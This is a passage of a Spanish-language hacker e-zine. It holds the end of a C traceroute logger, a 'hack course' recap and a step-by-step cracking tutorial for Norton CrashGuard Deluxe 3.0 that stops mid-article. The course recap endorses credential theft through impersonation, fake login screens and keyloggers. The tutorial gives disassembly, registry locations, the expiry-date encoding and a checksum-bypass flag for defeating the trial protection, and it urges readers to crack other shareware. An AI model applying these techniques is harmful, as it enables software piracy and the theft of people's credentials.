- FD_SET(sockfd[w], &readfds);
- }
- }
- }
-
- /* we use buf for misc stuff O:-) */
- sprintf (buf,"TRACEROUTE desde IP %s. Host: %s HOPS: %d",
- inet_ntoa(remote_addr.sin_addr), getname(remote_addr.sin_addr), hops / 3 +1);
- syslog(LOG_NOTICE , buf);
- FD_ZERO(&readfds);
- for(w=3D0; w<NUMPORTS; w++)
- FD_SET(sockfd[w], &readfds);
- }
- }
-
- ------------ FIN -------------------------------------------------------------
-
- Traducido por CubikIce -- cubikice@iname.com
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- - CURSO DE HACK -
- CHAPTER V
-
- Bueno, como ya se dijo en la Editorial este es el fin del primer
- volumen, por lo que creo que sera aconsejable en este numero, dar un
- repaso de las lecciones aprendidas. Ahora ya deberiamos tener una nocion
- basica de Hacking, pasando por la ingenieria social hasta un analisis de
- un server, pero para los que no les quedo claro, con lo expuesto aqui ya
- saldran de dudas y para aquellos que ya lo hayan aprendido pues un
- repaso no les vendra nada mal.
-
- Como vimos en el primer numero fue la ingenieria social, esto no
- creo que sea muy dificil de entender, basicamente consiste en hacernos
- pasar por otra persona con el fin de sacarle su login y password o algun
- tipo de informacion confidencial. Con el tiempo se ira cogiendo practica
- con esta tecnica y ademas seguir los pasos explicados en el numero 1º del
- ezine, ya que tenemos que tener mucho cuidado de lo que decimos y de quien
- nos hacemos pasar, ya que nos podriamos delatar.
-
- El capitulo II esta enfocado a tecnicas hacker utilizando el
- ordendaor como herramienta, me estoy refiriendo logicamente a: Shoulder
- Surfing, Trashing, Pantallas Falsas y Key Recorder. Ahora explicaremos cada
- una de las diferentes tecnicas. Shoulder Surfing es sencillamente mirrar por
- encima del hombro cuando una persona esta metiendo su login y password para
- entrar en su cuenta. Trashing cuando 'cotilleamos' la basura de un ISP,
- Telefonica, etc... con el fin de obtener alguna informacion util para
- hackear. Las Pantallas Falsas son cuando escribimos un pequeño programa que
- simula la conexion a un servidor y cuando la victima introduce su login y
- password, estos quedan grabados para nuestro posterior uso. Los Key
- Recorder son parecidos a las Pantallas Falsas, ya que eston son unos
- pequeños programas que se dejan residentes en memoria para que vaya grabando
- las teclas que los usuarios pulsen. Logicamente aqui solo he definido de
- manera sencilla el uso de las diferentes tecnicas, para profundizar en la
- materia conviene leerse otra vez el numero II del ezine.
-
- El capitulo III se dedico a una interesante y util herramienta de un
- hacker, me estoy refiriendo al scaneo de puertos, ya que esto nos sera de
- gran ayuda para buscar bug's en los servidores y poder colarnos o taparlos
- :). Es conveniente tener a mano un listado de los puertos, como el que se
- incluyo en el ezine III y tb disponer de varios tipos de scaners como por
- ejemplo para scanear puertos, sub-dominios, etc... Al igual que antes para
- coger mas soltura leerse el capitulo III.
-
- - Aqui Os Pongo Un Listado De Diferentes Scaners Que Os Pueden Ser Utiles.
-
- #ident-scan.c
-
- #ftp-scan.c
-
- #jakal.c
-
- #strobe103_tar.gz
-
- #scan.sh
-
- #statd-scan.c
-
- #udpscan.c
-
-
- El capitulo IV junto con el III consiste en analisis de servidores,
- en esta entrega vimos como utilizar diferentes comandos del s.o. Unix/Linux
- para obtener informacion de un servidor remoto. Siendo muy util tanto para
- un hacker como para un Administrador. Tengo que confesar que no explique
- todos los comandos que nos pueden ser utiles para un analisis pero si lo
- explico todo, entonces no tiene gracia y como es bien sabido 'Un hacker se
- hace a si mismo a base de estudio y paciencia'. Tambien deciros que para
- aplicar estos metodos de analisis conviene saber Unix/Linux ya que sino,
- si solo plagiamos los comandos explicados, no sabemos que hacen exactamente
- y no queremos aprender nada mas, entonces no llegaremos muy lejos y ni
- siquiera seremos un intento de hacker.
-
- Ahora ya creo que las dudas que hubiese podido haver han desaparecido,
- pero lo conveniente seria volverse a leer los capitulos que no hayan quedado
- claros y por supuesto experimentar con lo aprendido. Desde estas lineas
- quiero hacer un llamamiento a aquellos lectores que sigan el curso y
- consigan resultados positivos para que nos envien un mail poniendo en el
- subject :'Curso Hack JJF' y asi lo pondre aqui para que todos lo vean,
- incluso si has creado algo nuevo, pues mucho mejor :) Para los paranoicos
- tenemos a disposicion la llave publica PGP de - J.J.F. / HACKERS TEAM -.
-
- Pues viene el tipico rollo pero que nos puede ser muy util, es el
- bocabulario tecnico que hemos estado usando en el curso.
-
- - Un Poco De Bocabulario Tecnico.
-
- #C: Lenguaje de programacion general.
-
- #Hacker: Persona que disfruta explorardo nuevos usos en la tecnologia por
- puro placer, jamas con fines delictivos.
-
- #Hacking: Accion realizada por un hacker.
-
- #Ingenieria Social: Tecnica por el cual un hacker engaña a una persona para
- sacarle informacion privilegiada.
-
- #Key Recorder: Programa el cual graba las teclas que van siendo pulsadas.
-
- #Linux: Sistema Operativo semejante al Unix el cual es gratis.
-
- #Pantallas Falsas: Tecnica o Programa el cual simula la conexion a un
- servidor para interceptar login y password.
-
- #PGP: Pretty Good Privacy. Programa de criptografia el cual no puede ser
- desencriptado actualmente.
-
- #Puerto: Medio por el cual un servicio de un servidor se comunica con el
- cliente.
-
- #Shoulder Surfing: Tecnica que consiste en mirrar por el encima del hombro.
-
- #S.O.: Sistema Operativo.
-
- #Trashing: Tecnica en la cual se cotillea la basura fisicamente para obtener
- informacion util.
-
- #Unix: Sistema Operativo, que cual es multitarea y multiusuario.
-
- Bueno chicos, esto es todo por hoy y ya en el proximo capitulo
- haremos algo mas interesante, pero como debeis comprender estos capitulos de
- repaso son necesarios.
-
- Byes all y hasta la vista !!
-
- CONDE VAMPIRO
- - J.J.F. / HACKERS TEAM -
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- -->>-> CORTA HISTORIA DEL TIEMPO <-<<--
-
- Norton CrashGuard Deluxe 3.0
-
- TIPOS DE PROTECCIONES TEMPORALES
- UN POCO DE TEORIA
- EN BUSCA DE LA FRASE MAGICA
- EL REGISTRO DEL SISTEMA
-
- COMO CRACKEAR Norton CrashGuard Deluxe 3.0
-
- PRIMERA EXPLORACION
- PRIMERA SORPRESA
- SEGUNDA SORPRESA
-
- LA APROXIMACION DIFICIL
-
- AL ATAQUEEEEEEEEEEEEEE
- LA FECHA DE CADUCIDAD
- CHECKSUMS PARAINOCOS
- CHECKSUMS HASTA EN LA SOPA
- LA MISMA PROTECCION EN TODOS SITIOS
-
- LA APROXIMACION FACIL
-
- REUNIENDO LAS PIEZAS
- LA COMPRA VIRTUAL
- MODIFICANDO EL REGISTRO
- MODIFICACI╙N DE LA VARIABLE DEL REGISTRO DEL SISTEMA
-
- MORALEJA
-
- Saludos Familia.
-
- Bastante tiempo desde mi ultimo articulo, los se, pero ya estamos de
- vuelta. Nos ocuparemos ahora de las protecciones temporales, veremos un
- poco de teoria y lo aprendido lo aplicaremos al programa Noton Uncrash
- Deluxe desde dos puntos de vista, el temporal y el de la password pa
- registrarse.
-
- TIPOS DE PROTECCIONES TEMPORALES
-
- Demos un peque repaso a los diferentes esquemas de proteccion
- temporal que nos podemos encontrar (recomiendo la lectura del Capitulo
- 4.1 de +ORC )
-
- - CINDERELLA. El programa funciona durante una cierto periodo de dias
- (digamos 15 dias) comenzando desde la fecha de instalacion.
-
- - BEST_BEFORE. El programa funciona durante una cierto periodo de
- tiempo independientemente de la fecha de instalacion. El programa caduca
- el 30/12/97.
-
- - COUNTDOWN. El programa funciona solo durante unos minutos o unos
- segundos.
-
- - QUIVER. El programa funciona solo durante un numero determinado de
- ejecuciones. Realmente no es una proteccion temporal, pero su esquema de
- proteccion se parece mucho al de los otros tres tipos.
-
- UN POCO DE TEORIA
-
- Analizemos como funciona una proteccion temporal.
-
- Los "inteligentes programadores" ofertan sus productos completos al
- publico con ridiculas protecciones. Le colocan una fecha de caducidad,
- pasada la cual, el programa no funciona. Esta idea la utilizan sobretodo
- las grandes compañias como Micro$oft, Corel, o Symantec. La idea es
- distribuir masivamenete sus productos aprovechando los estupendos canales
- de distribucion que ofrecen las revistas de Soft. Una vez inundado el
- mercado, el usuario disfrutara del producto, se acostumbrara a el, hasta
- que le sea indispensable y tenga que comprarlo a un precio desorbitado.
- Esta tactica no es nueva, sino preguntad a algun camello, o como la CIA
- distribuyo la heroina entre el Black Power.
-
- Pensemos un poco. ¿Como conoce el programa que ya ha caducado el
- periodo de evaluacion?. Supongamos que tenemos una evaluacion e 15 dias e
- instalamos nuestro programa el 1 de febrero. Sumando la fecha de
- instalacion (1 Febrero) mas el periodo de prueba se obtiene la fecha de
- caducidad:15 febrero (El dia en el que lo instalas cuenta como dia habil).
- El programa, lo primero que calcula es si la fecha actual es menor o igual
- que la fecha de caducidad, y en tal caso, se ejecuta normalmente. Si es
- mayor, dara un bonito mensaje "El periodo de evaluacion ha expirado".
-
- Una cosa esta clara, el programa debe guardar alguna de las dos
- fechas siguientes (o las dos):
-
- A - Fecha de Instalacion y el periodo de evaluacion.
- B - Fecha de caducidad.
-
- Lo normal es la opcion B. Al instalarse el programa, se calcula la
- fecha de caducidad y se guarda en algun sitio. Normalmente se guarda en el
- registro del sistema bajo algun nombre estupido, aunque se puede guardar en
- el win.ini, system.ini, fichero oculto, o algun fichero que parezca
- inofensivo. Lo cierto es que debe guardarlo.
-
- Existe una variante, y es que la fecha de caducidad este dentro del
- ejecutable. Un ejemplo lo tenemos en la evaluacion del Hotmetal 4.0., del
- tipo BEST_BEFORE, que dentro de su ejecutable aparecia 31/12/97. Madre de
- Mitra, que estupidos pueden llegar a ser los zombi-programadores.
- Dependiendo de la pericia del programador la fecha de caducidad puede estar
- o no encriptada para ocultarla de la vista del usuario y para que sea
- dificil modificarla. Resumiendo, el programa debe guardar la fecha de
- caducidad y comprobarla al inicio del programa con la fecha actual.
-
- Ya sabemos de donde saca la fecha de cadudidad, pero, ¿de donde saca
- la fecha actual?. Normalmente (el 99% de las veces) se extrae con una
- llamada a la funcion getlocaltimeo o getsystemtime. Pero se puede extraer
- viendo la fecha de algun fichero que se modifique periodicamente como el
- system.dat o el bootlog.txt.
-
- Los puntos de ataque a este esquema son claros:
-
- - Atacar en el calculo de la fecha de caducidad.
- En vez de sumar 15 dias sumamos 15 siglos. Esta aproximacion es dificil por
- que el calculo se realiza una unica vez, generalmente en la instalacion.
-
- - Modificar la fecha de caducidad.
- Si la fecha esta encriptada, necesitariamos construir un algoritmo de
- encriptacion para la nueva fecha que deseemos introducir. Por lo que en
- general, puede ser complicado.
-
- - Forzar la caducidad del programa.
- Se analizan los mensajes que da el programa y a partir de ellos se le sigue
- la pista hacia atras. Es una tactica muy utilizada.
-
- - Atacar en la comprobacion de la fecha actual y la fecha de
- caducidad.
- Simplemente modifica la comprobacion para que siempre estemos en el periodo
- de evaluacion. Esta es una opcion elegante.
-
- Alguien podria pensar que si se echa pa tras el reloj de W95, la
- proteccion temporal se elimina. Para evitar esta "trampilla", los
- programadores colocan codigo como el siguiente:
-
- SI esta activada la marca de caducidad ENTONCES el programa ha
- caducado y se finaliza el programa DE LO CONTRARIO SI
- fechaActual>fechaCAducidad ENTONCES activar marca de caducidad
-
- Como veis si os pasais de la fecha de caducidad, se activa una marca
- que impedira que se ejecute el programa aunque modifiqueis el reloj. Esta
- marca se guarda en los mismos sitios donde se guarda la fecha de caducidad.
-
- A veces, la proteccion temporal queda eliminada introduciendo una
- palabra clave, por lo que a veces es mas rapido atacar por la password.
-
- Para averiguar el fichero que contiene la proteccion temporal, se
- puede usar el SoftIce y poner un bpx getlocaltime, o bien una nueva tecnica,
- muy util no solo para protecciones temporales. Veamosla.
-
- EN BUSCA DE LA FRASE MAGICA
-
- Todos los mensajes de un programa, los de error, los de felicitacion,
- los de aviso, no son mas que cadenas de caracteres que deben de residir en
- un fichero. Para protecciones temporales es util buscar mensajes como
- 'expire', 'demo', 'evaluation'. Si localizamos estos mensajes habremos
- localizado, generalmente, el fichero que contiene la proteccion y podemos
- desensamblarlo o pasarle el Softice. Extendiendo esta idea, basta con
- buscar los mensajes 'unregistered', 'register' para localizar el programa
- con la proteccion en esquemas por palabra clave. Recomiendo una herramienta
- excelente para buscar cadenas, es el programa sr32.exe, Search & Replace
- for Win 3x 95/NT, Funduc Software, Inc. (www.funduc.com). Bajaoslo y
- crackearlo, tiene una bonita y sencillota proteccion del tipo CINDERELLA.
-
- EL REGISTRO DEL SISTEMA
-
- El Registro del Sistema no es mas que un fichero gigante (system.dat)
- donde W95 y el esto de los programas dejan sus miserias, osea, sus
- variables, sus parametros de configuracion, su fecha de caducidad, sus
- marcas de caducidad. Muchos cracks solo necesitan modificar adecuadamente
- el system.dat Es muy conveniente que le echeis un vistazo, aprendereis
- mucho y podreis modificar muchos de los parametros del Windoze.
-
- Para editar el registro, se utiliza normalmente el programa
- regedit.exe que encontrareis en vuestro directorio de Windows. Recomiendo
- que lo ejecuteis con el parametro /v ,osease, c:\windows\regedit /v
-
- COMO CRACKEAR Norton CrashGuard Deluxe 3.0
-
- Objetivo: Norton Uncrash Deluxe.
- Version: 3.0
- Nombre del ejecutable: ncgd3w95.exe
- Website: http://www.symantec.com
- Tamaño del ejecutable: 11.964.671 bytes.
- Tipo de proteccion: Cindirella
- Dificultad: Medio.
- Tiempo de crackeo: 2 horas.
- Herramientas: W32dasm8.X, SoftIce.
-
- En esta ocasion, nuestro objetivo es una gran y abominable compañia,
- la Symantec y uno de sus muchos y abominables producto: Norton CrashGuard
- Deluxe 3.0 Basicamente, el programa consigue, en algunas ocasiones, que las
- aplicaciones que se cuelgan no bloqueen al Windoze. Cosa de agradecer dado
- el alto indice de siniestralidad de las aplicaciones y del propio Windoze.
- Ademas de tener una B.D de informacion sobre el PC, una antivirus ... Se
- protege con proteccion temporal CINDERELLA de 30 dias.
-
- PRIMERA EXPLORACION
-
- Instalamos el programa y antes de finalizar la instalacion ya nos
- pide que nos registremos, mal asunto, quieren cobrar antes de que probemos
- su producto, su codicia de palpa ante incluso de ver el programa.
-
- Una vez instalado, nos ha metido a escondidas varias cosas:
-
- - Una Dll con un extraño nombre: 30vfv6vn.sys situada en el raiz de
- la unidad c: El nombre varia en cada instalacion, solo permanece fijo
- *fv6vn.sys, los 3 primeros caracteres son variables. Sospecho que solo es un
- indicador para ver si el programa ya ha sido instalado.
-
- - Una aplicacion en el arranque del Windoze Norton CrashGuard Deluxe
- Autocheck. Si pulsais CRTL+ALT+SUPR podreis ver la aplicacion por dos veces
- con el nombre de checkup Su mision es detectar cualquier cambio en el reloj
- del sistema para bloquear inmediatamente la aplicacion si nos pasamos de la
- fecha de caducidad.
-
- Ademas se crean dos directorios Norton CrashGuard y Norton CrashGuard
- Deluxe y nos aparece un bonito icono en el escritorio del Windoze con forma
- de escudo y con el original nombre de Norton CrashGuard Deluxe. Y si por si
- fuera poco, dos iconos en la barra de tareas, la aplicacion propiamemte
- dicha (escudo gris con una N en azul) y una historia de los cuelges de los
- programas (un reondel con una marca de verificacion).
-
- Si pulsamos en el icono del escritorio nos aparece una ventana donde
- nos dice que nos compremos INMEDIATAMENTE la aplicacion a un precio
- fabuloso, $45.95, (unas 7.000 pelas) En la parte inferior aparecen el
- numero de dias que restan para el programa deje de funcionar. Ademas
- aparecen unos bonitos botones en los que nos podemos registrar por Internet,
- probar el producto o cancelar. Si probamos el producto, aparece la ventana
- principal con todas pas opciones. Si elegimos la opcion de registro,
- aparece una pantalla donde introducimos nuestros datos y nuestra tarjeta de
- credito.
-
- PRIMERA SORPRESA
-
- El sistema de pago no es de la propia Symantec, sino de la empresa
- Release Software Corporation:http://www.releasesoft.com) y su programa
- SalesAgen. Es la primera vez y veo que Symantec no controle todos los
- aspectos de una aplicacion.
-
- SEGUNDA SORPRESA
-
- El fichero a estudiar es el Norton CrashGuard\cgmain.exe (229.376
- bytes) por una simple razon, tiene el unico fichero que tiene el icono que
- el del programa principal que aparece en la barra de tareas. Pero, en el
- mismo directorio aparece un extraño fichero llamado cgmain.dl_ (743.936
- bytes). Mu raro, una libreria aparentemente comprimida (y por tanto no
- utilizada) con un tamaño mas grande que el ejecutable. Por que no esta
- descomprimida la libreria, ¿quizas por que no estamos registrados? :-)
-
- Ademas aparece un ejecutable llamado cgmaipop.exe , cuyo nombre es mu
- parecido al fichero del programa que estamos analizando cgmain.exe y tiene
- un icono que tiene las letras RS, que curioso, justo las Iniciales del la
- empresa que dedica a comercializar el producto: Release Software. Si
- intentamos ejecutar cgmaipop.exe aparece que esta preparando el Software.
- PREPARANDO?, ¿es que hay que precalentar los programas antes de
- instalarlos?. Luego aparece un mensaje de error indicando que no podemos
- ejecutar la aplicacion, ¿quizas por que no estamos registrados? :-)
-
- Por si fuera poco, aparece otro fichero cgmaitky.dll (257.977) con un
- nombre muy parecido al de la aplicacion que queremos estudiar y
- aproximadamente con el mismo tamaño. Y el colmo, en el otro directorio,
- donde reside el menu de la aplicacion Norton CrashGuard Deluxe\CGDeluxe.exe
- aparecen los ficheros CGDelpop.exe con el logo RS y CGDeltky.dll.
- Analogamente para Norton CrashGuard Deluxe\checkup.exe (el programa de
- testeo de la fecha del sistema) CheckUp.dl_,Checktky.dll
-
- Todo esto huele a chamusquina, seguro que estos ficheros tienen algo
- que ver a la hora de registrar el programa, y como veremos en la segunda
- pate del articulo, tienen que ver y MUCHO.
-
- LA APROXIMACION DIFICIL
-
- AL ATAQUEEEEEEEEEEEEEE
-
- Podriamos analizar esos extraños ficheros que han aparecido, y lo
- haremos en la segunda parte del articulo. Ahora atacaremos formalmente a
- Norton CrashGuard\cgmain.exe para analizar su esquema CINDERELLA de 30 dias.
-
- Desensamblamos el programa con el w32dsam y obtenmos 3.5 MB de
- fichero. En las funciones importadas encontramos Addr:00045CC8 hint(00F5)
- Name: GetLocalTime. Bien, bien, asi que, aparentemente, esta usando la
- tipica rutina para obtener la fecha del sistema. Si vemos quien la utiliza,
- estaremos en plena rutina de comprobacion de fecha: fechaActual>fecha de
- caducidad?
-
- Solamente aparece la funcion getlocaltime que es utilizada una vez en
- el programa(¿por que lo ponen tan facil?)
-
- * Referenced by a CALL at Addresses:
- |:0040D5B4 , :0040DA44 , :0040DD3F; La rutina es llamada 3 veces
-
- :0041E200 81ECCC000000 sub esp, 000000CC
- :0041E206 8D442410 lea eax, dword ptr [esp+10]
- :0041E20A 50 push eax
-
- * Reference To: KERNEL32.GetLocalTime, Ord:00F5h
- |
- :0041E20B FF15BC544400 Call dword ptr [004454BC]
- :0041E211 8D4C2400 lea ecx, dword ptr [esp]
- :0041E215 51 push ecx
-
- * Reference To: KERNEL32.GetSystemTime, Ord:0135h
- |
- :0041E216 FF15B8544400 Call dword ptr [004454B8]
- .....
-
- Ademas aparece la llamada tambien a GetSystemTime.
-
- Tras la llamada a GetSystemTime los valores de año, mes, dia,.... son
- extraidos de la pila y guardados en los registros :0041E21 mov dx, word ptr
- [esp+0A] De los registros pasan a unas variables globales :0041E2AA mov
- dword ptr [0042F7F0], edx
-
- Recordad, cualquier posicion de memoria fija como [0042F7F0], es
- utilizada como variable global por el programa. Despues se reintroducen en
- la pila el año, el mes, el dia,.... y se llama a la rutina :0041E310 call
- 00423420.
-
- En esta rutina es donde se realiza la encriptacion de la fecha,al
- finalizar, devuelve en eax la fecha encriptada y ademas de guardarse en
- :0041E323 mov dword ptr [ecx], eax
-
- Es mas, las tres llamadas a :0041E200 obtendran en eax la fecha
- encriptada de vuelta por call 00423420. Nos os voy a aburrir con diciendo
- como es la rutina de encriptacion. Simplemente decir que utiliza la
- siguiente formula :
-
- t=seconds+(secondsMinute*minutes)+(secondsHour*hour)+(secondsDay*day)+
- (secondsDay*daysMonth[month])+(secondsYear*(year-1900))+(secondsDay*((
- (year-1900)-1)/4));
- fin=(t+fixValue);
-
- Siempre es mas facil comparar un numero que comparar años, dias,
- meses,... por eso la fecha se transforma en un numero. He construido un
- pequeño programa NORTON.EXE en C que realiza todo el proceso de
- encriptacion de la fecha.
-
- Bien, lo logico, es que una vez encriptada la fecha se compruebe con
- la fecha de caducidad que debe estar encriptada. Si analizamos las tres
- llamadas a :0041E200 tenemos:
-
- * La llamada desde :0040D5B4, se limita a guardar la fecha encriptada
- :0040D641 mov dword ptr [esi+000002AC], eax
-
- * La llamada desde :0040DA44, :0040DD3F hacen practicamente lo mismo,
- mueven la fecha encriptada que estaba en eax a un registro, hacen una
- llamada a call 40DC40 y despues comprueban la fecha encriptada con
- [edi+00000284]
-
- En concreto para la llamada desde :0040DD3F
- :0040DD4B mov ebx, eax
-
- :0040DD62 push ebx
- :0040DD63 call 0040DC40
-
- :0040DD7B cmp dword ptr [edi+00000284], ebx
- :0040DDBF ja 0040DDE4
-
- En concreto para la llamada desde :0040DA44
-
- :0040DA54 mov edi, eax
-
- :0040DA5F push edi
- :0040DA60 call 0040DC40
-
- :0040DAB2 cmp dword ptr [ebx+00000284], edi
- :0040DAB8 ja 0040DACE
-
- Esto suena a una doble comprobacion temporal, seran desconfiados
- estos chicos.
-
- ¿Pero que hace la llamada a call 0040DC40?, para ello cerramos el
- cgmain.exe: boton derecho sobre el icono de la N y el escudo y exit.
- Abrimos el loader del Softice y seleccionamos Norton CrashGuard\cgmain.exe
- y ponemos un bpx 40DC40 y lanzamos el programa. Aparecemos en el Softice,
- pulsamos F10 y vemos que ha sido llamada desde :40DD63. Cerramos el
- cgmain.exe otra vez, ponemos el softice un bpx 40DD63 y lanzamos el
- programa y prestamos atencion a ebx que es el que contiene la fecha
- encriptada.
-
- La llamada a call 0040DC40 simplemente realiza la siguiente
- comprobacion
-
- :0040DC56 cmp edx, eax; compara fechaAnterior,fechaActual
- :0040DC58 ja 0040DC64; Salta si eres un mal chico.
-
- fechaAnterior es la fecha encriptada el la que se arranca por ultima
- vez el programa, fechaActual es la fecha encriptada obtenida de :0041E200.
- Es una simple comprobacion para ver si hemos echado para atras el reloj.
-
- La comprobacion
-
- cmp dword ptr [ebx+00000284], edi; Analogamente cmp dword ptr
- [edi+00000284], ebx
- ja 0040DACE; Analogamente ja 0040DDE4
-
- Comprueba fechaCaducidad > fechaActual Si es mayor estamos en el
- periodo de prueba.
-
- LA FECHA DE CADUCIDAD
-
- La pregunta es, ¿de donde se guarda la fecha de caducidad encriptada?.
- Poniendo un bpr ebx+00000284 ebx+00000284+5 descubrimos que la fecha de
- encriptacion se guarda en el registro del sistema y es recuperada por la
- llamada a la funcion :40BD89 RegqueryValueEXA. En concreto, se guarda en
- HKEY_CLASSES_ROOT\Ultxfile\Format\MSHAEZDOC\write
-
- En mi caso, el valor de write es:
-
- 01 02 03 04 05 06 07 08
-
- 01 00 00 00 05 B7 FF FF F8
- 02 00 00 00 00 00 00 10 00
- 03 08 00 00 00 08 00 00 00
- 04 00 00 00 06 B3 36 71 A1
- 05 FB 0F 81 A5 20 80 00 06
- 06 B7 9F A9 A0 00 00 00 00
- 07 00 00 00 06 B3 36 71 A0
- 08 C3 28 00 00 18 00 00 00
- 09 00 00 00 00 00
-
- La fecha de caducidad esta en write(5,7) hasta write(6,5) ambos
- inclusive. Lo curioso, es que la fecha esta codificada, por ejemplo si la
- fecha de caducidad es 0034F5F3D6 se guarda en write 0006B79FA9A000. La
- rutina de encriptacion esta en :40C0D6 y se basa en la operacion or
-
- :0040C0D6 8A18 mov bl, byte ptr [eax]
- :0040C0D8 8A11 mov dl, byte ptr [ecx]
- :0040C0DA C0E305 shl bl, 05
- :0040C0DD 48 dec eax
- :0040C0DE C0EA03 shr dl, 03
- :0040C0E1 49 dec ecx
- :0040C0E2 0ADA or bl, dl
- :0040C0E4 4E dec esi
- :0040C0E5 885101 mov byte ptr [ecx+01], dl
- :0040C0E8 885901 mov byte ptr [ecx+01], bl
-
- He creado dos programas DECODE que decodifica el valor de write y
- CODE que codifica un valor de fecha para introducirlo en write.
-
- CHECKSUMS PARAINOCOS
-
- Los puntos de ataque son claros
-
- 1.- Parchear las comprobaciones en el ejecutable.
- 2.- Introducir una fecha caducidad en el año 30000.
-
- 1.- Si parcheamos el programa, se produce un error tan gordo que se
- casca windows. Esto se puede deber a que hemos crackeado mal obien exite un
- checksum. Para salir de dudas, basta con modificar alguna cadena de
- caracteres del ejecutable original Por ejemplo "not be run in DOS mode" lo
- pasamos a "not be RUN in DOS mode", si se casca es que hay un checksum,
- como en este caso.
-
- Un checksum es una comprobacion para ver si el ejecutable se ha
- modificado, normalmente se realiza sumando (XOR) los bytes del ejecutable y
- guardando este valor algun sitio (ejecutable, registro del sistema). El
- programa al arrancar suma (XOR) los bytes del ejecutable actual y comprueba
- la suma con el valor que tenia guardado. Si hay algun problema es que un
- virus o un cracker ha modificado el programa y esto nunca es bueno para el
- programador.
-
- En el caso del Norton CrashGuard Deluxe 3.0, el checksum se realiza
- de otra forma. Os acordais del fichero cgmaitky.dll, si hombre ese que nos
- parecia tan sospechoso. Pos bien, guarda todos los bytes del cgmain.exe
- encriptados (de ahi que tuvieran un tamaño tan parecido ambos ficheros). La
- rutina de checksum, simplemente consiste en coger de 16 en 16 los bytes del
- cgmain.exe encriptarlos y ver si son iguales a 16 bytes del fichero
- cgmaitky.dll. Si existe alguna diferencia se produce un error de proteccion
- general y se casca todo.
-
- Para complicarlo todo, las rutinas de comprobacion (ver si los 16
- bytes del ejecutable son iguales a los 16 bytes del cgmaitky.dll) no estan
- metidas en un bucle, sino que estan a lo extenso. Es decir, hay una rutina
- de comprobacion para los 16 primeros bytes, otra disinta para los 16
- siguientes. Si queremos parchear el checksum, habra que modificar unas 30
- comprobaciones. Es curioso, pero existe un flag que desactiva la llamada al
- checksum :0040862D jne 00408695 si obligamos a saltar siempre, evitamos el
- checksum. PERO, ¿POR QUE EXISTE UN FLAG PARA EVITAR EL CHECKSUM?, ¿es que
- el programa cgmain.exe va a modificarse? Como veremos mas tarde, asi
- ocurrira.
-
- 2.- Con el programa NORTON se crea la fecha de caducidad que queremos,
- con el programa CODE se encripta y ya solo hay que introducir el resultado
- en HKEY_CLASSES_ROOT\Ultxfile\Format\MSHAEZDOC\write en las posiciones
- write(5,7),write(6,5)
-
- CHECKSUMS HASTA EN LA SOPA
-
- Cuando la fecha de caducidad ha vencido, el programa deja de
- funcionar parcialmente, si analizamos el porque descubrimos que el byte
- [esi+00000568] controla todo el meollo. En concreto,
-
- Si [esi+00000568] = 02 You cannot Run this Application
- Si [esi+00000568] = 20 Your computer application source has changed
- Si [esi+00000568] = 08 Your free trial period is over
- Si [esi+00000568] = 04 OK
-
- Pero, ¿como se rellena este byte?. Siguiendo la pista hacia atras
- descubrimos que se carga a partir de
- HKEY_CLASSES_ROOT\Ultxfile\Format\MSHAEZDOC\open
-
- 00 01 02 03 04 05 06 07
-
- 1 00 00 00 00 30 00 00 00
- 2 00 00 00 00 00 00 10 00
- 3 08 08 00 00 20 00 00 00
- 4 00 00 00 00 00 00 00 00
-
- En concreto de write(3,4). Hay que tener cuidado por que esta
- encriptado, asi que hay que utilizar el programa DECODE. Osea , si en
- write(3,4)=20 indica que al desencriptarlo [esi+00000568]=4. Si
- write(3,4)=40 la fecha de caducidad ha vencido.
-
- Si ha pasado la fecha de caducidad y asignamos write(3,4)=20, el
- programa replica diciendo que hemos trampeado los recursos. ¿QUE PASA AQUI?.
-
- Mu facil, HAY UN CHECKSUM en la seccion
- HKEY_CLASSES_ROOT\Ultxfile\Format\MSHAEZDOC\open. Estos es paranoico, un
- checksum en el propio registro del sistema. En concreto, el checksum esta
- en write(1,4). Se deja como ejercicio localizar y destruir este checksum.
-
- LA MISMA PROTECCION EN TODOS SITIOS
-
- Aunque parezca increible, los ficheros CGDeluxe.exe y CheckUp.exe
- tienen exactamente la misma proteccion que cgmain.exe y ademas en los
- mismos offset, osea en las mismas direcciones de memoria. Esto es
- extremadamente extraño, asi que adoptaremos otra via de ataque.
-
- LA APROXIMACION FACIL
-
- Veamos lo que tenemos:
-
- - Unos ficheros extraños asociados a los ficheros importantes.
- Sabemos la funcion de uno de ellos los *tky.dll sirven de checksum, pero y
- el resto para que sirven?
-
- - Un flag que desactiva el checksum del ejecutable.
-
- - Unos misteriosos fichero ejecutables con el logo RS que dicen que
- tiene que prepara el Sotware.
-
- Nos centraremos en los ejecutables con los logos RS.
-
- REUNIENDO LAS PIEZAS
-
- Para cada utilidad , p.e. CGDeluxe.EXE existe un fichero,
- CGDeltky.dll, que realiza funciones de checksum (como ya vimos), una
- libreria de un gran tamaño , CGDeluxe.dl_ ,y un ejecutable CGDelpop.exe que
- "prepara el Software".
-
- No hay que ser un lince para darse cuenta que CGDelpop.exe "prepara"
- de alguna forma CGDeluxe.dl_ para aportar toda la funcionalidad a
- CGDeluxe.EXE. Esta "preparacion" solo se realiza cuando estamos registrados.
-
- Por tanto, se parte de un archivo ejecutable de un tamaño inferior a
- la version completa del programa. Una vez realizado el proceso de compra se
- activa otro ejecutable que convierte la version de prueba en version
- completa .
-
- Todas las demas utilidades que acompañan al Norton CrashGuard Deluxe
- tienen el mismo proceso (CheckUP.exe ->Checkpop.exe, Checkup.dl_,
- Checktky.dll) (Cgmaipop.exe ->cgmain.exe, cgmaitky.dll)
-
- LA COMPRA VIRTUAL
-
- Nos centraremos en el asistente (CGDeluxe.EXE) de compra que vimos en
- nuestra "Primera Aproximacion" : Doble click en el escudo con la N que hay
- en el escritorio y al pulsar el boton Buy Now (comprar ahora) aparece el
- asistente de compra.
-
- Este sera nuestro punto de entrada. Si pensamos un poco observaremos
- que la aplicacion que lanza el proceso de compra debe saber si la compra ha
- tenido exito o no. Por tanto, sera por aqui por donde centremos nuestros
- esfuerzos. Ademas debe de anunciar de alguna forma al resto de utilidades
- que la compra ha tenido exito para que ellas tambien se "preparen"
- Analizaremos el ejecutable CGDeluxe.exe (que el que se lanza al pulsar el
- icono del escritorio) y observaremos como "compra".
-
- Nada mejor que usar un desensamblador para investigar el programa
